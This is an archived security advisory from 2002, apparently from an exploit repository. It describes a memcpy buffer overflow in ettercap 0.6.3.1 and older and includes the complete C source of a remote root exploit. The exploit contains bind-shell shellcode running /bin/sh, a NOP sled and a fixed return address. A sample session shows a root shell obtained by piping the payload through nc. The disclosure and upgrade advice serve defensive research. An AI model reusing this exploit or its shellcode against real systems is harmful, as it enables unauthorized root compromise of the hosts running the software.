exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ettercap-0.6.3.txt

ettercap-0.6.3.txt
Posted Feb 19, 2002
Authored by FJ Serna | Site ngsec.com

Ettercap v0.6.3.1 and below advisory and remote root exploit against Linux. Due to improper use of the memcpy() function, anyone can crash ettercap and execute code as root user.

tags | exploit, remote, root
systems | linux
SHA-256 | 0707e613e12873f42925d43ba22b3e2a53a3329febbdea8c7110ba8cc31f4e41

ettercap-0.6.3.txt

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1



Next Generation Security Technologies
http://www.ngsec.com
Security Advisory


Title: Ettercap, remote root compromise
ID: NGSEC-2002-1
Application: ettercap 0.6.3.1 and older (http://ettercap.sourceforge.net)
Date: 05/02/2002
Status: Vendor Contacted, new fixed version released.
Platform: Linux on interfaces with MTU > 2000
Author: Fermín J. Serna <fjserna@ngsec.com>
Location: http://www.ngsec.com/docs/advisories/NGSEC-2002-1.txt


Overview:
- ---------

As it is said in ettercap's home page "Ettercap is a multipurpose
sniffer/interceptor/logger for switched LAN". Due to improper use of the
memcpy() function, anyone can crash ettercap and execute code as root
user.

Vulnerabiliy has been confirmed and exploited in ettercap's version
0.6.3.1. Older versions maybe vulnerable too.

This vulnerability only exists on Linux version because on *BSD and MacOSX
ettercap only works on ethernets devices.

Technical description:
- ----------------------

Ettercap is composed of decoders which looks for user, passwords,
communities and stuff alike.

Several decoders (mysql, irc, ...) suffer the following problem:

memcpy(collector, payload, data_to_ettercap->datalen);

Collector is declared as:

u_char collector[MAX_DATA];

Where MAX_DATA is:

#define MAX_DATA 2000

Datalen is the data (after TCP/UDP header) length read from the interface.
So on interfaces where MTU is higher than 2000 you can exploit ettercap.
Since normal ethernets have MTU:1500 this bug can not be exploited due to
unsupported defragmentation in ettercap, but may be crashed with a forged
packet (ip->tot_len > MAX_DATA).

Here are common MTU and interface types:

65535 Hyperchannel
17914 16 Mbit/sec token ring
8166 Token Bus (IEEE 802.4)
4464 4 Mbit/sec token ring (IEEE 802.5)
1500 Ethernet
1500 PPP (typical; can vary widely)


Exploit for this vulnerability can be found at

http://www.ngsec.com/dowloads/exploits/ettercap-x.c

Sample explotation could be also in loopback interfaces: MTU:16436

piscis:~# ettercap -NszC -i lo &
[1] 21887
piscis:~# ./ettercap-x 0 | nc localhost 3306
ettercap-0.6.3.1 xploit by Fermín J. Serna <fjserna@ngsec.com>
Next Generation Security Technologies
http://www.ngsec.com

punt!
piscis:~# telnet localhost 36864
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
id;
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),10(wheel)


Recomendations:
- ---------------

Upgrate to a newer ettercap version.
Run ettercap on a secure environment.


More advisories at: http://www.ngsec.com/advisories/
PGP Key: http://www.ngsec.com/labs.asc

(c)Copyright 2002 NGSEC. All rights reserved.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: Made with pgp4pine 1.76

iD8DBQE8awI5KrwoKcQl8Y4RAl5HAJsHgiOuhE08kArQNKrOPPhQDkW6swCfUkAH
307ifuCsbg5mxFlTvhr4jbY=
=o2T9
-----END PGP SIGNATURE-----


/*
* ettercap-0.6.3.1 remote root xploit
*
* By: Fermín J. Serna <fjserna@ngsec.com>
* Next Generation Security Technologies
* http://www.ngsec.com
*
* DESCRIPTION:
* ============
*
* Several decoders (mysql, irc, ...) suffer the following problem:
*
* memcpy(collector, payload, data_to_ettercap->datalen);
*
* collector is declared as:
*
* u_char collector[MAX_DATA];
*
* where MAX_DATA is:
*
* #define MAX_DATA 2000
*
* So on interfaces where MTU is higher than 2000 you can exploit
* ettercap. Nop, normal ethernets have MTU:1500 ;P
*
* Here are common MTU and interface types:
*
* 65535 Hyperchannel
* 17914 16 Mbit/sec token ring
* 8166 Token Bus (IEEE 802.4)
* 4464 4 Mbit/sec token ring (IEEE 802.5)
* 1500 Ethernet
* 1500 PPP (typical; can vary widely)
*
* Sample explotation could be also in loopback interfaces: MTU:16436
*
* piscis:~# ettercap -NszC -i lo &
* [1] 21887
* piscis:~# ./ettercap-x 0 | nc localhost mysql
* ettercap-0.6.3.1 xploit by Fermín J. Serna <fjserna@ngsec.com>
* Next Generation Security Technologies
* http://www.ngsec.com
*
* punt!
* piscis:~# telnet localhost 36864
* Trying 127.0.0.1...
* Connected to localhost.
* Escape character is '^]'.
* id;
* uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
*
* Madrid, 5/02/2002
*
*/


#include <stdio.h>
#include <string.h>

#define NUM_ADDR 100
#define NOP 0x41
#define BUFF_SIZE 2200
#define RET_ADDR 0xbfffea58
#define OFFSET 0

char shellcode[]=
"\x1b\xeb\x78\x5e\x29\xc0\x89\x46\x10\x40\x89\xc3\x89\x46\x0c\x40"
"\x89\x46\x08\x8d\x4e\x08\xb0\x66\xcd\x80\xeb\x01\x3C\x43\xc6\x46"
"\x10\x10\x66\x89\x5e\x14\x88\x46\x08\x29\xc0\x89\xc2\x89\x46\x18"
"\xb0\x90\x66\x89\x46\x16\x8d\x4e\x14\x89\x4e\x0c\x8d\x4e\x08\xb0"
"\x66\xcd\x80\x89\x5e\x0c\x43\x43\xb0\x66\xcd\x80\x89\x56\x0c\x89"
"\x56\x10\xb0\x66\x43\xcd\x80\xeb\x01\x2D\x86\xc3\xb0\x3f\x29\xc9"
"\xcd\x80\xb0\x3f\x41\xcd\x80\xb0\x3f\x41\xcd\x80\x88\x56\x07\x89"
"\x76\x0c\x87\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80\xe8\x83\xff\xff\xff"
"/bin/sh";

int main(int argc, char **argv) {
char buffer[BUFF_SIZE];
char *ch_ptr;
unsigned long *lg_ptr;
int aux;
int offset=OFFSET;

fprintf(stderr,"ettercap-0.6.3.1 xploit by Fermín J. Serna <fjserna@ngsec.com>\n");
fprintf(stderr,"Next Generation Security Technologies\n");
fprintf(stderr,"http://www.ngsec.com\n\n");


if (argc==2) offset=atoi(argv[1]);

memset(buffer,0,sizeof(buffer));

ch_ptr=buffer;
memset(ch_ptr,NOP,sizeof(buffer)-strlen(shellcode)-4*NUM_ADDR);
ch_ptr+=sizeof(buffer)-strlen(shellcode)-4*NUM_ADDR;
memcpy(ch_ptr,shellcode,strlen(shellcode));
ch_ptr+=strlen(shellcode);
lg_ptr=(unsigned long *)ch_ptr;
for (aux=0;aux<NUM_ADDR;aux++) *(lg_ptr++)=RET_ADDR+offset;
ch_ptr=(char *)lg_ptr;
*ch_ptr='\0';

printf("%s",buffer);

return(0);

}


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close